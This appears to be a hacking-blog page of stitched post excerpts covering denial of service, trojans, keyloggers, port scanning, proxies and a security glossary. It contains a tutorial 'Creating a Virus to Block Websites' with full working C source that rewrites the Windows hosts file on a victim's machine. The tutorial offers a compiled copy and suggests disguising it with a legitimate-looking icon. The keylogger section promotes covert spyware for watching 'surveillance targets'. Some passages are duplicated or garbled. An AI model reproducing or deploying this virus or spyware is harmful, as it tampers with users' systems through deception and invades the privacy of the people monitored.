Denial Of Service Attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

What is a Denial Of Service Attack?

 

• A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.


• If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

• bandwidth attacks,


• protocol attacks, and


• logic attacks
  
  

What is Distributed Denial of Service Attack?

• An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.


• This makes it difficult to detect because attacks originate from several IP addresses.


• If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Read More

Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

• It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.


• Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

 

• Attacker gets access to the trojaned system as the system goes online


• By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

• Remote Access Trojans


• Password Sending Trojans


• Keyloggers


• Destructive


• Denial Of Service (DoS) Attack Trojans


• Proxy/Wingate Trojans


• FTP Trojans


• Software Detection Killers

Modes of Transmission

• Attachments


• Physical Access


• Browser And E-mail Software Bugs


• NetBIOS (File Sharing)


• Fake Programs


• Un-trusted Sites And Freeware Software

Backdoor Countermeasures

• Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)


• An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.


• Educate your users not to install applications downloaded from the internet and e-mail attachments.

Read More

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and

2. Hardware based.

Spy ware: Spector (http://www.spector.com/)

• Spector is a spy ware and it will record everything anyone does on the internet.


• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.


• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: eBlaster (http://www.spector.com/)

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

 

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

<

The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Read More

Port Scanning

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

• A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.


• By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.


• Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

Port Scanning Techniques can be broadly classified into:

• Open scan


• Half- open scan


• Stealth scan


• Sweeps


• Misc

Commonly used tools for port scanning

1.Tool: SuperScan 3.0

 

 

 

 

 

 

 

 

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003

4. Tool: ipEye, IPSecScan

Read More

Proxy Servers and Anonymizers

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 

• As firewall, a proxy protects the local network from outside access.


• As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.


• Proxy servers can be used (to some extent) to anonymize web surfing.


• Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.


• Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.


• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.


• An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

Read More

Creating a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>

#include<dos.h>

#include<dir.h>

char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;

int find_root(void);

void block_site(void);

int find_root()

{

int done;

struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

else return 0;

}

void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}

void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}

How to Compile ?

1. Download the source code here. Download the compiled module(virus) here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post:How to Change the ICON of an EXE file ?

Read More

Common Terminologies used in Internet Security

If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

Read More